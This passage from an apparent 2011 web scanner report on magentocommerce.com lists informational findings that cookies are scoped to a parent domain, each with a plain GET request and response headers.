Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A25%3A%22%2Fservices%2Fcourse-pricing%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:27 GMT
Content-Length: 35078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.137. http://www.magentocommerce.com/services/course-schedule  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/course-schedule

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services/course-schedule HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175751; expires=Sat, 11-Aug-2012 15:02:31 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fservices%2Fcourse-schedule%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:31 GMT
Content-Length: 49762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.138. http://www.magentocommerce.com/services/descriptions  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/descriptions

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services/descriptions HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/training
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170926; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A2%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.6.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:09 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171049; expires=Sat, 11-Aug-2012 13:44:09 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:09 GMT
Content-Length: 57276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.139. http://www.magentocommerce.com/services/professional-services  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/professional-services

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services/professional-services HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175764; expires=Sat, 11-Aug-2012 15:02:44 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fservices%2Fprofessional-services%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:45 GMT
Content-Length: 35091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.140. http://www.magentocommerce.com/services/register-for-training  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/register-for-training

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services/register-for-training HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175732; expires=Sat, 11-Aug-2012 15:02:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A32%3A%22%2Fservices%2Fregister-for-training%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:13 GMT
Content-Length: 41049

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.141. http://www.magentocommerce.com/services/testimonials  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/testimonials

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services/testimonials HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175741; expires=Sat, 11-Aug-2012 15:02:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fservices%2Ftestimonials%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:21 GMT
Content-Length: 36222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.142. http://www.magentocommerce.com/services/thank-you  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/thank-you

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services/thank-you HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:02:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175752; expires=Sat, 11-Aug-2012 15:02:32 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fservices%2Fthank-you%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:02:32 GMT
Content-Length: 730

<div class="contact-popup-top">
<div class="top-l-corner"></div>
<div class="top-r-corner"></div>
</div>
<a class="popup-close" onclick="contactBox.close();" href="#"><img src="http://www.mage
...[SNIP]...
3.143. http://www.magentocommerce.com/services/training  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /services/training

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /services/training HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/media/screencasts
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170923; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A1%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A2%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproduct%2Fenterprise-level%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.5.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:27 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171066; expires=Sat, 11-Aug-2012 13:44:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:26 GMT
Content-Length: 37516

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.144. http://www.magentocommerce.com/showcase  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /showcase

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /showcase HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:12:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176322; expires=Sat, 11-Aug-2012 15:12:02 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A10%3A%22%2Fshowcase%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:12:02 GMT
Content-Length: 50996

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.145. http://www.magentocommerce.com/sitemap/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /sitemap/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /sitemap/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:14:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176452; expires=Sat, 11-Aug-2012 15:14:12 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fsitemap%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:14:12 GMT
Content-Length: 55319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.146. http://www.magentocommerce.com/support/magento-user-guide-book  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /support/magento-user-guide-book

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /support/magento-user-guide-book HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176223; expires=Sat, 11-Aug-2012 15:10:23 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A33%3A%22%2Fsupport%2Fmagento-user-guide-book%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:23 GMT
Content-Length: 39756

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.147. http://www.magentocommerce.com/support/magento_core_api  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /support/magento_core_api

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /support/magento_core_api HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:36 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176236; expires=Sat, 11-Aug-2012 15:10:36 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A26%3A%22%2Fsupport%2Fmagento_core_api%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:36 GMT
Content-Length: 34959

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.148. http://www.magentocommerce.com/support/overview  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /support/overview

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /support/overview HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:10:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176215; expires=Sat, 11-Aug-2012 15:10:15 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A18%3A%22%2Fsupport%2Foverview%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:10:16 GMT
Content-Length: 37099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.149. http://www.magentocommerce.com/svn  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /svn

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /svn HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176280; expires=Sat, 11-Aug-2012 15:11:20 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A5%3A%22%2Fsvn%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:21 GMT
Content-Length: 33351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.150. http://www.magentocommerce.com/system-requirements  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /system-requirements

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /system-requirements HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176280; expires=Sat, 11-Aug-2012 15:11:20 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A21%3A%22%2Fsystem-requirements%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:20 GMT
Content-Length: 34053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
3.151. http://www.magentocommerce.com/trackback/2509/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /trackback/2509/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trackback/2509/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:17:38 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
